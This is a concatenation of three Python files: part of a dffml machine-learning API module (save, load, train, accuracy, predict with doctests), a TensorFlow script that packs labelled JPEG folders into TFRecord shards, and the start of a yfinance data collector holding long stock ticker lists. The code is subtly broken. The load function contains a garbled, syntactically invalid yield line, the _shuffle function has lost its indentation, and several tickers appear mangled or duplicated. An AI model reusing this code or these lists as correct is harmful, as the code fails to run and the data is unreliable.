    ----------
    source : BaseSource
        Data source to use. See :doc:`/plugins/dffml_source` for sources and
        options.
    *args : list
        Records to be saved.
    Examples
    --------
    >>> import asyncio
    >>> import pathlib
    >>> from dffml import *
    >>>
    >>> source = CSVSource(filename="save.csv", allowempty=True, readwrite=True)
    >>>
    >>> async def main():
    ...     await save(
    ...         source,
    ...         Record(
    ...             "myrecord",
    ...             data={
    ...                 "features": {"Years": 0, "Expertise": 1, "Trust": 0.1},
    ...                 "prediction": {"Salary": {"value": 10, "confidence": 1.0}},
    ...             }
    ...         )
    ...     )
    ...     print(pathlib.Path("save.csv").read_text().strip())
    >>>
    >>> asyncio.run(main())
    key,tag,Expertise,Trust,Years,prediction_Salary,confidence_Salary
    myrecord,untagged,1,0.1,0,10,1.0
    """
    # Open the source, then write all records within a single source context
    # so the source can batch/flush once on exit.
    async with source:
        async with source() as sctx:
            for record in args:
                await sctx.update(record)
async def load(source: BaseSource, *args: str) -> AsyncIterator[Record]:
    """
    Yields records from a source.
    Yields all the records from the source, if record keys are given then only
    those records are yielded.
    Parameters
    ----------
    source : BaseSource
        Data source to use. See :doc:`/plugins/dffml_source` for sources and
        options.
    *args : str
        Records to be returned. If empty, all the records in a source will be returned.
    Returns
    -------
    asynciterator
        :py:class:`Record <dffml.record.Record>` object
    Examples
    --------
    >>> import asyncio
    >>> from dffml import *
    >>>
    >>> source = CSVSource(filename="load.csv", allowempty=True, readwrite=True)
    >>>
    >>> async def main():
    ...     await save(
    ...         source,
    ...         Record("1", data={"features": {"A": 0, "B": 1}}),
    ...         Record("2", data={"features": {"A": 3, "B": 4}}),
    ...     )
    ...
    ...     # All records in source
    ...     async for record in load(source):
    ...         print(record.export())
    ...
    ...     # For specific records in a source
    ...     async for record in load(source, "1"):
    ...         print(record.export())
    >>>
    >>> asyncio.run(main())
    {'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
    {'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}
    {'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
    """
    async with source:
        async with source() as sctx:
            if args:
                # If specific records are to be loaded, look each key up
                # individually (unknown keys surface as the source's default
                # empty Record or an error, depending on the source).
                for record in args:
                    yield record await sctx.record(record) if False else (await sctx.record(record))
            else:
                # All the records are loaded
                async for record in sctx.records():
                    yield record
async def train(model, *args: Union[BaseSource, Record, Dict[str, Any]]):
    """
    Train a machine learning model.
    Provide records to the model to train it. The model should be already
    instantiated.
    Parameters
    ----------
    model : Model
        Machine Learning model to use. See :doc:`/plugins/dffml_model` for
        models options.
    *args : list
        Input data for training. Could be a ``dict``, :py:class:`Record`,
        filename, one of the data :doc:`/plugins/dffml_source`, or a filename
        with the extension being one of the data sources.
    Examples
    --------
    >>> import asyncio
    >>> from dffml import *
    >>>
    >>> model = SLRModel(
    ...     features=Features(
    ...         Feature("Years", int, 1),
    ...     ),
    ...     predict=Feature("Salary", int, 1),
    ...     directory="tempdir",
    ... )
    >>>
    >>> async def main():
    ...     await train(
    ...         model,
    ...         {"Years": 0, "Salary": 10},
    ...         {"Years": 1, "Salary": 20},
    ...         {"Years": 2, "Salary": 30},
    ...         {"Years": 3, "Salary": 40},
    ...     )
    >>>
    >>> asyncio.run(main())
    """
    # Normalize dicts / Records / filenames / sources into a Sources list.
    sources = _records_to_sources(*args)
    # Enter source and model, then their contexts, and delegate the actual
    # training loop to the model context.
    async with sources as sources, model as model:
        async with sources() as sctx, model() as mctx:
            return await mctx.train(sctx)
async def accuracy(
    model, *args: Union[BaseSource, Record, Dict[str, Any]]
) -> float:
    """
    Assess the accuracy of a machine learning model.
    Provide records to the model to assess the percent accuracy of its
    prediction abilities. The model should be already instantiated and trained.
    Parameters
    ----------
    model : Model
        Machine Learning model to use. See :doc:`/plugins/dffml_model` for
        models options.
    *args : list
        Input data for training. Could be a ``dict``, :py:class:`Record`,
        filename, one of the data :doc:`/plugins/dffml_source`, or a filename
        with the extension being one of the data sources.
    Returns
    -------
    float
        A decimal value representing the percent of the time the model made the
        correct prediction. For some models this has another meaning. Please see
        the documentation for the model your using for further details.
    Examples
    --------
    >>> import asyncio
    >>> from dffml import *
    >>>
    >>> model = SLRModel(
    ...     features=Features(
    ...         Feature("Years", int, 1),
    ...     ),
    ...     predict=Feature("Salary", int, 1),
    ...     directory="tempdir",
    ... )
    >>>
    >>> async def main():
    ...     print(
    ...         "Accuracy:",
    ...         await accuracy(
    ...             model,
    ...             {"Years": 4, "Salary": 50},
    ...             {"Years": 5, "Salary": 60},
    ...         ),
    ...     )
    >>>
    >>> asyncio.run(main())
    Accuracy: 1.0
    """
    # Normalize dicts / Records / filenames / sources into a Sources list.
    sources = _records_to_sources(*args)
    async with sources as sources, model as model:
        async with sources() as sctx, model() as mctx:
            # Coerce to float so callers always get a plain number regardless
            # of what numeric type the model context returns.
            return float(await mctx.accuracy(sctx))
async def predict(
    model,
    *args: Union[BaseSource, Record, Dict[str, Any]],
    update: bool = False,
    keep_record: bool = False,
):
    """
    Make a prediction using a machine learning model.
    The model must be trained before using it to make a prediction.
    Parameters
    ----------
    model : Model
        Machine Learning model to use. See :doc:`/plugins/dffml_model` for
        models options.
    *args : list
        Input data for prediction. Could be a ``dict``, :py:class:`Record`,
        filename, or one of the data :doc:`/plugins/dffml_source`.
    update : boolean, optional
        If ``True`` prediction data within records will be written back to all
        sources given. Defaults to ``False``.
    keep_record : boolean, optional
        If ``True`` the results will be kept as their ``Record`` objects instead
        of being converted to a ``(record.key, features, predictions)`` tuple.
        Defaults to ``False``.
    Returns
    -------
    asynciterator
        ``Record`` objects or ``(record.key, features, predictions)`` tuple.
    Examples
    --------
    >>> import asyncio
    >>> from dffml import *
    >>>
    >>> model = SLRModel(
    ...     features=Features(
    ...         Feature("Years", int, 1),
    ...     ),
    ...     predict=Feature("Salary", int, 1),
    ...     directory="tempdir",
    ... )
    >>>
    >>> async def main():
    ...     async for i, features, prediction in predict(
    ...         model,
    ...         {"Years": 6},
    ...         {"Years": 7},
    ...     ):
    ...         features["Salary"] = round(prediction["Salary"]["value"])
    ...         print(features)
    >>>
    >>> asyncio.run(main())
    {'Years': 6, 'Salary': 70}
    {'Years': 7, 'Salary': 80}
    """
    # Normalize dicts / Records / filenames / sources into a Sources list.
    sources = _records_to_sources(*args)
    async with sources as sources, model as model:
        async with sources() as sctx, model() as mctx:
            async for record in mctx.predict(sctx):
                # Either hand back the full Record, or unpack it into the
                # (key, features, predictions) tuple documented above.
                yield record if keep_record else (
                    record.key,
                    record.features(),
                    record.predictions(),
                )
                if update:
                    # Persist the prediction back into the source it came from.
                    await sctx.update(record)
|
build_image_data.py | #!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
This module implements TFRecords creation based on filetree and train/val ratio as a lab example for BSU students.
The image data set is expected to reside in JPEG files located in the following directory structure:
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into a sharded data set consisting of TFRecord files
output_directory/train-00000-of-01024
...
output_directory/train-01023-of-01024
and
output_directory/validation-00000-of-00128
...
output_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set.
The labels file contains a list of valid labels where each line corresponds to a label.
We map each label contained in the file to an integer corresponding to the line number starting from 0.
Each record within the TFRecord file is a serialized
Example proto. The Example proto contains many fields, the most important are:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
# NOTE(review): eager execution is disabled -- presumably for compatibility
# with the TF1-era graph helpers below; confirm it is still required.
tf.compat.v1.disable_eager_execution()
# Command-line flags: input/output locations, sharding, and threading.
flags.DEFINE_string('input', default=None, help='Data directory')
flags.DEFINE_string('output', default=None, help='Output directory')
flags.DEFINE_integer('shards', 10, 'Number of shards per split of TFRecord files.')
flags.DEFINE_integer('num_threads', 2, 'Number of threads to preprocess the images.')
flags.DEFINE_string('labels_file', 'labels', 'Labels file')
# Parsed flag values, populated by app.run() at startup.
FLAGS = flags.FLAGS
def _int64_feature(value):
    """Wrap a scalar int or list of ints as an int64 Feature proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _bytes_feature(value):
    """Wrap a single bytes value as a bytes Feature proto."""
    wrapped = tf.train.BytesList(value=[value])
    return tf.train.Feature(bytes_list=wrapped)
def _convert_to_example(filename, image_buffer, label, text):
    """Build an Example proto for an example.
    Args:
      filename: string, path to an image file, e.g., '/path/to/example.JPG'
        (not serialized into the Example; kept for interface symmetry)
      image_buffer: string, JPEG encoding of RGB image
      label: integer, identifier for the ground truth for the network
      text: string, unique human-readable, e.g. 'dog'
    Returns:
      Example proto with 'image/label', 'image/text' and 'image/encoded'
      features.
    """
    example = tf.train.Example(features=tf.train.Features(feature={
        'image/label': _int64_feature(label),
        'image/text': _bytes_feature(tf.compat.as_bytes(text)),
        'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
    return example
def _process_image(filename, coder):
    """Process a single image file.
    Args:
      filename: string, path to an image file e.g., '/path/to/example.JPG'.
      coder: unused here; kept for interface compatibility with callers that
        pass an image coder (e.g. for decode/colorspace conversion).
    Returns:
      image_buffer: string, JPEG encoding of RGB image.
    """
    # Read the image file. FIX: the previous version returned `image_data`
    # without ever assigning it, which raised NameError at runtime.
    with tf.io.gfile.GFile(filename, 'rb') as f:
        image_data = f.read()
    return image_data
def _process_image_files_batch(
    thread_index, ranges, name, filenames, texts, labels, num_shards
):
    """Processes and saves list of images as TFRecord in 1 thread.
    Args:
      thread_index: integer, unique batch to run index is within [0, len(ranges)).
      ranges: list of pairs of integers specifying ranges of each batches to
        analyze in parallel.
      name: string, unique identifier specifying the data set
      filenames: list of strings; each string is a path to an image file
      texts: list of strings; each string is human readable, e.g. 'dog'
      labels: list of integer; each integer identifies the ground truth
      num_shards: integer number of shards for this data set.
    """
    # Each thread produces N shards where N = int(num_shards / num_threads).
    # For instance, if num_shards = 128, and the num_threads = 2, then the first
    # thread would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)
    shard_ranges = np.linspace(ranges[thread_index][0],
                               ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0
    for s in range(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output, output_filename)
        shard_counter = 0
        # FIX: the context manager closes/flushes the writer even when a record
        # fails mid-shard; previously the writer leaked on error paths.
        with tf.io.TFRecordWriter(output_file) as writer:
            files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
            for i in files_in_shard:
                filename = filenames[i]
                label = labels[i]
                text = texts[i]
                try:
                    with tf.io.gfile.GFile(filename, 'rb') as f:
                        image_buffer = f.read()
                except Exception as e:
                    # Best-effort: skip unreadable files rather than abort the shard.
                    print(e)
                    print('SKIPPED: Unexpected error while decoding %s.' % filename)
                    continue
                example = _convert_to_example(filename, image_buffer, label, text)
                writer.write(example.SerializeToString())
                shard_counter += 1
                counter += 1
                if not counter % 1000:
                    print('%s [thread %d]: Processed %d of %d images in thread batch.' %
                          (datetime.now(), thread_index, counter, num_files_in_thread))
                    sys.stdout.flush()
        print('%s [thread %d]: Wrote %d images to %s' %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print('%s [thread %d]: Wrote %d images to %d shards.' %
          (datetime.now(), thread_index, counter, num_files_in_thread))
    sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
    """Process and save list of images as TFRecord of Example protos.
    Args:
      name: string, unique identifier specifying the data set
      filenames: list of strings; each string is a path to an image file
      texts: list of strings; each string is human readable, e.g. 'dog'
      labels: list of integer; each integer identifies the ground truth
      num_shards: integer number of shards for this data set.
    """
    assert len(filenames) == len(texts)
    assert len(filenames) == len(labels)
    # Break all images into batches with a [ranges[i][0], ranges[i][1]].
    # FIX: `np.int` was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin `int` is the documented replacement and behaves identically here.
    spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
    ranges = []
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])
    # Launch a thread for each batch.
    print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
    sys.stdout.flush()
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    threads = []
    for thread_index in range(len(ranges)):
        args = (thread_index, ranges, name, filenames, texts, labels, num_shards)
        t = threading.Thread(target=_process_image_files_batch, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print('%s: Finished writing all %d images in data set.' %
          (datetime.now(), len(filenames)))
    sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
    """Build a list of all images files and labels in the data set.
    Args:
      data_dir: string, path to the root directory of images.
        Assumes that the image data set resides in JPEG files located in
        the following directory structure.
          data_dir/dog/another-image.JPEG
          data_dir/dog/my-image.jpg
        where 'dog' is the label associated with these images.
      labels_file: string, path to the labels file.
        The list of valid labels are held in this file. Assumes that the file
        contains entries as such:
          dog
          cat
          flower
        where each line corresponds to a label. We map each label contained in
        the file to an integer starting with the integer 0 corresponding to the
        label contained in the first line.
    Returns:
      filenames: list of strings; each string is a path to an image file.
      texts: list of strings; each string is the class, e.g. 'dog'
      labels: list of integer; each integer identifies the ground truth.
    """
    print('Determining list of input files and labels from %s.' % data_dir)
    # FIX: read the labels file inside a context manager so the handle is
    # closed (the previous version leaked the open GFile).
    with tf.io.gfile.GFile(labels_file, 'r') as f:
        unique_labels = [l.strip() for l in f.readlines()]
    labels = []
    filenames = []
    texts = []
    # Leave label index 0 empty as a background class.
    label_index = 1
    # Construct the list of JPEG files and labels.
    # NOTE(review): only '*.jpg' is globbed even though the module docstring
    # mentions .jpeg/.JPEG files -- confirm whether other extensions are meant
    # to be included.
    for text in unique_labels:
        jpeg_file_path = '%s/%s/*.jpg' % (data_dir, text)
        matching_files = tf.io.gfile.glob(jpeg_file_path)
        labels.extend([label_index] * len(matching_files))
        texts.extend([text] * len(matching_files))
        filenames.extend(matching_files)
        label_index += 1
    print('Found %d JPEG files across %d labels inside %s.' % (len(filenames), len(unique_labels), data_dir))
    return filenames, texts, labels
def _shuffle(filenames, texts, labels, train_split):
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
return [filenames[i] for i in shuffled_index], \
[texts[i] for i in shuffled_index], \
[labels[i] for i in shuffled_index], \
[train_split[i] for i in shuffled_index]
def main(_):
    """Entry point: convert the --input image tree into sharded TFRecords.

    Validates the required flags, creates the output directory, gathers every
    labelled image under --input, and writes them as the 'train' split.
    """
    assert FLAGS.input, ('Specify data root directory with --input flag')
    assert FLAGS.output, ('Specify destination directory with --output flag')
    assert not FLAGS.shards % FLAGS.num_threads, (
        'Please make the FLAGS.num_threads commensurate with FLAGS.shards')
    print('Saving results to %s' % FLAGS.output)
    # FIX: exist_ok avoids the check-then-create race of the previous
    # `if not os.path.exists(...): os.makedirs(...)` pattern.
    os.makedirs(FLAGS.output, exist_ok=True)
    # NOTE(review): _shuffle is defined but never called, so records are
    # written in label order and no validation split is produced -- the
    # module docstring suggests a train/val split was intended; confirm.
    names, texts, labels = _find_image_files(os.path.join(FLAGS.input), FLAGS.labels_file)
    _process_image_files('train', names, texts, labels, FLAGS.shards)
    print(f'Dataset size: {len(names)}')
if __name__ == '__main__':
    # absl's app.run parses the command-line flags before dispatching to main().
    app.run(main)
|
DataCollector.py | import numpy as np
import yfinance as yf
import matplotlib.pyplot as plt
import datetime
from datetime import datetime
import pandas as pd
import multiprocessing
import matplotlib.lines
tickers0 = ["DDD","MMM","WBAI","WUBA","EGHT","AHC","AOS","ATEN","AIR","AAN","ABB","ABT","ABBV","ANF","AGD","AWP","ACP","JEQ","AOD","ABM","AKR","ACEL","ACEL.W","ACN","ACCO","ATV","AYI","GOLF","ADX","PEO","AGRO","ADNT","ADT","ATGE","AAP","ADSW","WMS","ASIX","AVK","ACM","AEFC","AEB","AEG","AER","AJRD","AMG","MGR","AFL","MITT","AGCO","A","AEM","ADC","AL","APD","ALG","AGI","ALK","AIN","ALB","AA","ALC","ALEX","ALX","ARE","AQN","AQNA","AQNB","BABA","Y","ATI","ALLE","AGN","ALE","ADS","AFB","AWF","AB","AIO","CBH","NCV","NCZ","ACV","NIE","NFJ","ALSN","ALL","ALLY","PINE","ALTG","ALTG.W","AYX","ATUS","MO","ACH","ALUS","ALUS.U","ALUS.W","AMBC","AMBC.W","ABEV","AMC","AMCR","AEE","AMRC","AMOV","AMX","AAT","AXL","ACC","AEO","AEP","AEL","AXP","AFG","AFGB","AFGC","AFGH","AMH","AIG","AIG.WS","ARL","ARA","AWR","AMT","AVD","AWK","COLD","AMP","ABC","RYCE","AMN","AMRX","AP","APH","AXR","HKIB","AME","PLAN","FINS","AU","BUD","AXE","NLY","AM","AR","ANTM","ANH","AON","APA","AIV","APY","APHA","ARI","APO","AFT","AIF","APLE","AIT","ATR","APTV","ARMK","ABR","ARC","MT","ARCH","ADM","AROC","ARNC","ARCO","ACA","RCUS","ARD","ASC","AFC","ACRE","ARDC","ARES","AGX","ARGD","ARGO","ANET","AI","AIC","AIW","ARLO","AHH","ARR","AFI","AWI","ARW","AJG","APAM","ASA","ABG","ASX","ASGN","AHT","ASH","ASPN","AMK","ASB","AC","AIZ","AIZP","AGO","AZN","HOME","T","TBB","TBC","ATTO","ATH","ATKR","AT","ATCO","ATO","ACB","ATHM","ALV","AN","AZO","AVLR","AVB","AGR","AVNS","AVTR","AVYA","AVY","AVH","AVA","AXTA","AXS","AX","AXO","AZUL","AZRE","AZZ","BGS","BW","BGH","BMI","BCSF","BKR","BBN","BLL","BANC","BBAR","BBVA","BBD","BBDO","BCH","BLX","BSBR","BSAC","BSMX","SAN","CIB","BXS","BAC","BOH","BMO","NTB","BNS","BKU","BCS","BBDC","MCI","MPV","BNED","B","GOLD","BHC","BAX","BTE","BBX","BCE","BZH","BDX","BDXA","BDC","BRBR","BHE","BRK.A","BRK.B","BHLB","BERY","BBY","BEST","BGSF","BHP","BBL","BIG","BH","BH.A","BILL","BHVN","BIO","BIO.B","BITA","BJ","BKH","BKI","BSM","BB","BGIO","BFZ","CII","BHK","HYT","BTZ","DSU","BGR","BDJ","EGF","FR
A","BFO","BGT","BOE","BME","BMEZ","BAF","BKT","BGY","BKN","BTA","BZM","MHE","BIT","MUI","MNE","MUA","BKK","BBK","BBF","BYM","BFK","BLE","BTT","MEN","MUC","MUH","MHD","MFL","MUJ","MHN","MUE","MUS","MVT","MYC","MCA","MYD","MYF","MFT","MIY","MYJ","MYN","MPA","MQT","MYI","MQY","BNY","BQH","BSE","BFY","BCX","BST","BSTZ","BSD","BUI","BHV","BLK","BGB","BGX","BSL","BE","APRN","BXG","BXC","DCF","DHF","DMB","DSM","LEO","BA","BCC","BCEI","BOOT","BAH","BWA","BORR","SAM","BXP","BXP","BSX","BOX","BYD","BPMP","BP","BPT","BRC","BHR","BHR","BHR","BDN","BWG","LND","BAK","BRFS","BGG","MNRL","BFAM","BEDU","BSA","BSIG","BV","EAT","BCO","BMY","BMY~","BTI","BRX","BRMK","BR","BKD","BAM","BBU","DTLABI","BIP","RA","BEP","BEP","BRO","BF.A","BF.B","BRT","BC","BC","BC","BC","BKE","BVN","BBW","BG","BURL","BWXT","BY","PFH","CABO","CBT","COG","CACI","WHD","CADE","CAE","CAI","CAI","CAI","CAL","CRC","CWT","CALX","ELY","CPE","CPT","CCJ","CPB","CWH","GOOS","CM","CNI","CNQ","CP","CANG","CNNE","CAJ","CGC","CMD","COF","COF","COF","COF","COF","COF","CSU","BXMT","CPRI","CMO","CMO","CAH","CSL","KMX","CCL","CUK","CRS","CSV","CARR","CARS","CRI","CVNA","CSPR","CSLT","CTLT","CTT"]
tickers1 = ["SWP","SWT","STN","SGU","SRT","STWD","STT","STT","STT","SPLP","SPLP","SCS","SCA","SCM","SCL","STE","STL","STL","STC","SF","SF","SF","SFB","STM","EDF","EDI","STON","SRI","STOR","GJH","GJO","GJS","SYK","MSC","RGR","SPH","SMFG","INN","INN","INN","SUM","SMLP","SUI","SLF","SXC","SU","STG","NOVA","SUN","SHO","SHO","SHO","SPN","SUP","SUZ","SWZ","SWCH","SBE","SBE.U","SBE.WS","SYF","SYF","SNX","SNV","SNV","SNV","GJP","GJR","GJT","SYY","SYX","TLRD","TWN","TSM","TAK","TAL","TGE","TALO","SKT","TPR","NGLS","TRGP","TGT","TARO","TTM","TCO","TCO","TCO","TMHC","TRP","TCP","TSI","TEL","TISI","FTI","TECK","TK","TGP","TGP","TGP","TNK","TGNA","TRC","HQH","THQ","HQL","THW","TDOC","TEO","TDY","TFX","VIV","TEF","TDA","TDE","TDI","TDJ","TDS","TU","TDF","EMF","TEI","GIM","TPX","TS","TME","THC","TNC","TEN","TVC","TVE","TDC","TEX","TX","TRNO","TTI","TEVA","TPL","TGH","TXT","TFII","AES","BK","BK","BX","CEE","SCHW","SCHW","SCHW","COO","GDV","GDV","GDV","GDV","GRX","GRX","GDL","GDL","THG","THGA","MSG","RUBI","TRV","VAM","TMO","THR","TPRE","TSLF","TCRW","TCRZ","TRI","THO","TDW","TDW.WS","TDW.WS","TIF","TLYS","TSU","TKR","TMST","TWI","TJX","TOL","TR","BLD","TTC","TD","SHLL","SHLL.U","SHLL.W","NDP","TYG","TEAF","NTG","TTP","TPZ","TOT","TSQ","TM","TRTX","TSLX","TT","TAC","TCI","TDG","RIG","TGS","TRU","TREC","TG","THS","TREX","TY","TYTPH","TRNE","TRNE.U","TRNE.W","TNET","TRN","TSE","TPVG","TPVY","GTS","TRTN","TRTN","TRTN","TRTN","TRTN","TGI","TROX","TBI","TFC","TFC","TFC","TFC","TFC","TNP","TNP","TNP","TNP","TNP","TUFN","TUP","TKC","TPB","TRQ","TPC","TWLO","TRWH","TWTR","TWO","TWO","TWO","TWO","TWO","TWO","TYL","TSN","USB","USB","USB","USB","USB","USB","USPH","SLCA","USX","UBER","UI","UBS","UDR","UGI","UGP","UMH","UMH","UMH","UMH","UA","UAA","UFI","UNF","UN","UL","UNP","UIS","UNT","UMC","UNFI","UPS","URI","USM","UZA","UZB","UZC","X","UNH","UTL","UNVR","UVV","UHT","UHS","UVE","UTI","UNM","UNMA","UE","UBA","UBP","UBP","UBP","USFD","USAC","USNA","USDP","BIF","VFC","EGY","MTN","VAL","VALE","VL
O","VHI","VMI","VVV","VAPO","VAR","VGR","VEC","VEDL","VEEV","VEL","VNTR","VTR","VNE","VER","VER","VRTV","VZ","VET","VRS","VCIF","VERT.U","VRT","VRT.WS","VVI","VICI","VNCE","VIPS","SPCE","VGI","ZTR","V","VSH","VPG","VIST","VSTO","VST","VST.WS","VVNT","VVNT.W","VSLR","VMW","VOC","VCRA","VNO","VNO","VNO","VNO","VJET","IAE","IHD","VOYA","VOYA","IGA","IGD","IDE","IID","IRR","PPR","VMC","WTI","WPC","WRB","WRB","WRB","WRB","WRB","WRB","GRA","GWW","WNC","WBC","WDR","WD","WMT","DIS","HCC","WPG","WPG","WPG","WRE","WCN","WM","WAT","WSO","WSO.B","WTS","W","WBS","WBS","WEC","WEI","WRI","WMK","WBT","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","EOD","WELL","WCC","WST","WAL","WALA","WEA","TLI","EMD","GDO","EHI","HIX","HIO","HYI","SBI","IGI","PAI","MMU","WMC","DMO","MTT","MHF","MNP","GFY","WIW","WIA","WES","WU","WAB","WLK","WLKP","WBK","WRK","WHG","WEX","WY","WPM","WHR","WTM","WSR","WLL","WOW","WMB","WSM","WGO","WIT","WNS","WWW","WF","WK","INT","WWE","WOR","WPP","WPX","WYND","WH","XYF","XFLT","XHR","XRX","XIN","XPO","XYL","AUY","YELP","YETI","YEXT","YRD","DAO","YPF","YUMC","YUM","ZEN","ZBH","ZTS","ZTO","ZUO","ZYME"]
tickers2 = ["CAT","CATO","CBZ","CBL","CBL","CBL","CBO","IGR","CBRE","CBX","FUN","CDR","CDR","CDR","CE","CLS","CELG~","CEL","CPAC","CX","CVE","CNC","CEN","CNP","CNP","EBR","EBR.B","CEPU","CCS","CTL","CDAY","CF","GIB","ECOM","CHAP","CHRA","CRL","CLDT","CMCM","CHGG","CHE","CC","CHMI","CHMI","CHMI","CHK","CHK","CPK","CVX","CHWY","CHS","CIM","CIM","CIM","CIM","CIM","DL","CEA","CHN","CGA","LFC","CHL","COE","SNP","XRF","ZNH","CHA","CHU","CYD","CMG","CHH","CB","CHT","CHD","CCX","CCX.U","CCX.WS","CCXX","CCXX.U","CCXX.W","CIEN","CI","XEC","CBB","CBB","CNK","CINR","CIR","CIT","CIT","CCAC","CCAC.U","CCAC.W","BLW","C","C","C","C","C","CFG","CFG","CFG","CIA","CIO","CIO","CVEO","CCC","CLH","CCO","EMO","CEM","CTR","CLW","CWEN","CWEN.A","CLF","CLPR","CLX","CLDR","NET","CMS","CMS","CMSA","CMSC","CMSD","CNA","CNF","CNHI","CNO","CEO","CNXM","CNX","KOF","KO","CCEP","CDE","FOF","CNS","UTF","LDP","MIE","RQI","RNP","PSF","RFI","CFX","CFXA","CL","CCH","CCH.U","CCH.WS","CXE","CIF","CXH","CMU","CLNY","CLNY","CLNY","CLNY","CLNY","CLNC","CXP","STK","CCZ","CMA","FIX","CMC","CBU","CYH","CHCT","CIG","CIG.C","CBD","SBS","ELP","CCU","CODI","CODI","CODI","CODI","CMP","CRK","CAG","CXO","CCM","CNMD","COP","CCR","CEIX","ED","STZ","STZ.B","CSTM","TCS","CLR","VLRS","CTRA","CTB","CPS","CTK","CPA","CLB","CXW","CLGX","CORR","CORR","CPLG","COR","CNR","GLW","CAAP","GYC","OFC","CTVA","CZZ","CMRE","CMRE","CMRE","CMRE","CMRE","COTY","CUZ","CVA","CVIA","CPF","CR","CRD.A","CRD.B","BAP","CS","CPG","CEQP","CEQPCR","CRT","CAPL","CCI","CCI","CCK","CRY","CTS","CUBE","CUB","CFR","CULP","CMI","CURO","CW","SRF","SRV","SZC","CWK","CUBB","CUBI","CUBI","CUBI","CUBI","CUBI","CVI","UAN","CVS","CELP","DHI","DAN","DHR","DHR","DAC","DQ","DRI","DAR","DVA","DCP","DCP","DCP","DECK","DE","DEX","DDF","DKL","DK","DELL","DLPH","DAL","DLX","DNR","DBI","DESP","DB","DXB.CL","DVN","DHX","DHT","DEO","DO","DSSI","DRH","DSX","DSX","DKS","DBD","DLR","DLR","DLR","DLR","DLR","DLR","DLR","DDS","DDT","DIN","DFS","DNI","DMYT","DMYT.U","DMYT.W","DLB",
"DG","D","DCUE","DRUA","DPZ","UFS","DCI","DFIN","LPG","DSL","DBL","DLY","PLOW","DEI","DOV","DVD","DOW","RDY","DRD","DRQ","DS","DS","DS","DS","DTE","DTJ","DTP","DTQ","DTW","DTY","DCO","DSE","DNP","DTF","DUC","DPG","DUK","DUK","DUKB","DUKH","DRE","DD","DXC","DY","DLNG","DLNG","DLNG","DT","DX","DX","DX","CTA","CTA","ELF","EGIF","EXP","ECC","ECCB","ECCX","ECCY","EIC","ESTE","DEA","EGP","EMN","KODK","ETN","ETV","ETW","EV","EOI","EOS","EFT","EFL","EFF","EHT","ETX","EOT","EVN","ETJ","EFR","EVF","EVG","EVT","ETO","ETG","ETB","EXD","ETY","EXG","ECT","ECL","EC","EPC","EIX","EW","EP","EE","ELAN","ELAT","ESTC","EGO","ESI","ELVT","LLY","EFC","EFC","EARN","AKO.A","AKO.B","ERJ","EME","EEX","EBS","EMR","ESRT","EIG","EDN","ENBL","ENB","ENBA","EHC","DAVA","EXK","ENIA","ENIC","ENR","ENR","ET","ETP","ETP","ETP","EPAC","ERF","ENS","E","ENLC","EBF","ENVA","NPO","ETM","EAB","EAE","EAI","ETR","ELC","ELJ","ELU","EMP","ENJ","ENO","ETIEZT","EPD","EVC","ENV","NVST","EVA","ENZ","EOG","EPAM","EPR","EPR","EPR","EPR","EQM","EQT","EFX","EQNR","EQH","EQH","ETRN","EQC","EQC","ELS","EQR","EQS","ERA","EROS","ESE","ESNT","EPRT","WTRG","WTRU","ESS","EL","ETH","EURN","EEA","EB"]
